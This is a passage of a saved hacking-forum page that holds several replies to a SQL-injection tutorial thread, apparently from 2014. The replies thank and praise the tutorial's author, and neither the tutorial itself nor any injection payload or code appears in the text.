Wrote: <a href="http://www.hackforums.net/showthread.php?pid=38131855#pid38131855" class="quick_jump">►</a></cite>table name is displayed as many times as there are columns in table...</blockquote><br>BUT with a lil logic like u said and some counting its possible! Thanks for That BIG HINT and your great explanation!!!</div><div class="post_meta" id="post_meta_38139024"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38139024" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38144535" id="pid38144535"></a><table class="tborder" style="margin-top: 5px; " id="post_38144535" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-04-2014, 11:09 PM <span id="edited_by_38144535"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38144535#pid38144535">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1994305"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/759667hawk2.jpg" alt="" height="54" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1994305"><span class="group2">Blackhawk.</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 23<br>Posts: 291<br>Joined: Sep 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1994305"><strong class="reputation_positive">18</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38144535"><span style="font-weight: bold;"><span style="color: #32CD32;">"Special Thanks <span style="color: #1E90FF;">ajkaro</span> for the credits"</span></span> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Awesome Tutorial Learned Some New Things......<img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></span></span><br><br><span style="font-weight: bold;">Just Wanna Say One Thing :-</span><br><br><span style="color: #FF1493;"><span style="font-weight: bold;">"Creativity at its TOP Level" <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"></span></span><br><br><span style="font-weight: bold;">Regards,<br>Blackhawk</span></div><div class="post_meta" id="post_meta_38144535"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1994305" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38144535" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38146365" id="pid38146365"></a><table class="tborder" style="margin-top: 5px; " id="post_38146365" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-05-2014, 02:46 AM <span id="edited_by_38146365"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38146365#pid38146365">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1835121"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/avatar_1835121.png" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1835121"><span class="group9">H4xX0rn00b</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">L33t Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 3<br>Posts: 50<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1835121"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38146365">Thank you very very much =)<br>Learned some new Stuff today =D<br>Cheers <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_38146365"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1835121" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38146365" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38146370" id="pid38146370"></a><table class="tborder" style="margin-top: 5px; " id="post_38146370" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-05-2014, 02:47 AM <span id="edited_by_38146370"><span class="smalltext">(This post was last modified: 02-05-2014 02:48 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381">m4rk0n</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38146370#pid38146370">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381"><span class="group2">m4rk0n</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 22<br>Posts: 289<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1819381"><strong class="reputation_positive">7</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38146370">Wouldn't
 think, it's that easy. I've already come across this tweak, but 
wouldn't think of using it in this situation. Anyways, nicely 
explained...</div><div class="post_meta" id="post_meta_38146370"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1819381" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38146370" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38148869" id="pid38148869"></a><table class="tborder" style="margin-top: 5px; " id="post_38148869" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-05-2014, 06:51 AM <span id="edited_by_38148869"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38148869#pid38148869">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2059517"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/7Ijd4XB.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2059517"><span class="group2">TheCasanova</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 2<br>Posts: 65<br>Joined: Nov 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2059517"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38148869">thanx a lot ajkaro for such a good explanation </div><div class="post_meta" id="post_meta_38148869"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2059517" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38148869" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38171962" id="pid38171962"></a><table class="tborder" style="margin-top: 5px; " id="post_38171962" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-06-2014, 11:32 AM <span id="edited_by_38171962"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38171962#pid38171962">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,237<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38171962">Thank you guys for your feedback.<br><br>Some of you noticed it can be used in some other challenges from me <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"></div><div class="post_meta" id="post_meta_38171962"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38171962" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38338017" id="pid38338017"></a><table class="tborder" style="margin-top: 5px; " id="post_38338017" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-14-2014, 10:30 PM <span id="edited_by_38338017"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38338017#pid38338017">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2121665"><span class="group2">SystemX</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 12<br>Joined: Jan 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2121665"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38338017">thank you ajkaro. for your Excellent Tutorial you never dissapoint us to learn new tricks in SQLi . thumbs up :))</div><div class="post_meta" id="post_meta_38338017"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2121665" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38338017" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38575445" id="pid38575445"></a><table class="tborder" style="margin-top: 5px; " id="post_38575445" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-26-2014, 06:21 AM <span id="edited_by_38575445"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38575445#pid38575445">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2135244"><span class="group2">devilhunter_dante</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 22<br>Joined: Jan 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2135244"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38575445"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"> Amazing !<br>it's so Magical ! the Combination of Local Variables with DIOS <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>i wonder What will be Coming up in Your Next Tutorial <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br>Can't Wait... <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_38575445"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2135244" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38575445" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4040708">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4040708" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4040708&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4040708.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->